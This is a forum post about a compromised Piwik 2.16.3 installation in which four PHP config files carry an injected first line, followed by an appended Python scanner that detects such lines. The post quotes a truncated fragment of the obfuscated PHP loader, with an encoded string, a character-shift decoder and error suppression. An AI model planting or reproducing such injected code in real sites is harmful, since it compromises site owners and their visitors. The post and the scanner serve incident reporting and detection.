Hi folks. One of my customers called me to fix the following problem:
What I found was four changed INI files.
- config/config.ini.php
- plugins/PiwikPro/config/test.php
- plugins/MobileAppMeasurable/config/test.php
- plugins/CorePluginsAdmin/config/config.php
Every INI file has the same first “unusual” line:
<?php $ozwnijtsn = '75]D:M8]Df#<%tdz>#L4]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]2,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*cvpbbyz($n){return chr(ord($n)-1);} @error_reporbq}k;opjudovg}x;0]=]).....

The Piwik installation version was 2.16.3. My question is: does anyone know this security issue? I didn't find any advice. My solution to fix the problem was to reinstall the whole Piwik with an actual version. I am thankful for every hint!
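A defensive check built on the injected line quoted in the post, added here as an example and not part of the original post: it walks an installation and flags every `*.php` file whose first line shows at least two of the traits visible in that line. The 200-character threshold, the two-trait minimum, the function names and both sample lines are assumptions made for this example.

```python
import re
import sys
from pathlib import Path

# Traits visible in the injected first line quoted in the post.
OPEN_ASSIGN = re.compile(r"^\s*<\?php\s+\$[a-z]{6,}\s*=\s*'")  # <?php $ozwnijtsn = '
SHIFT_DECODER = re.compile(r"chr\s*\(\s*ord\s*\(\s*\$\w+\s*\)\s*-\s*1\s*\)")
SUPPRESS = "@error_repor"
LONG_LINE = 200  # assumed threshold, tune per code base

# Constructed samples (placeholder payload, not the real injected line).
SAMPLE_INJECTED = ("<?php $qwertyuiop = 'PLACEHOLDER'; "
                   "function dec($n){return chr(ord($n)-1);} @error_reporting(0);")
SAMPLE_CLEAN = "<?php return array('debug' => false);"


def score_first_line(line):
    """Return the names of the traits found in one first line."""
    hits = []
    if OPEN_ASSIGN.search(line):
        hits.append("opening-tag-assignment")
    if SHIFT_DECODER.search(line):
        hits.append("chr-ord-shift-decoder")
    if SUPPRESS in line:
        hits.append("error-suppression")
    if len(line) > LONG_LINE:
        hits.append("long-first-line")
    return hits


def scan_tree(root, min_hits=2):
    """Map relative path -> traits for every *.php file that looks injected."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        try:
            with path.open("r", encoding="utf-8", errors="replace") as fh:
                first = fh.readline(65536)  # only the first line matters here
        except OSError:
            continue  # unreadable entry: skip it, do not abort the scan
        hits = score_first_line(first)
        if len(hits) >= min_hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


if __name__ == "__main__":
    for name, hits in scan_tree(sys.argv[1]).items():
        print(f"{name}: {', '.join(hits)}")
```

Run it against a copy of the web root; a hit means the file needs manual review, and a clean result does not prove the installation is clean.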